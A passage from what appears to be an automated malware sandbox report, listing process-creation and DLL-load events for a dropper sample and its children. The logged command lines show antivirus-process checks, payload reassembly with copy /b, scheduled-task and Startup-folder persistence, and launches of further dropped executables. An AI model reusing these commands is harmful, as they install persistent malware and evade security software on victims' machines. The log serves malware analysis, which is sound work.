                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless EJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif EJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /FJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exitJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /FJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: wsock32.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: srvcli.dll
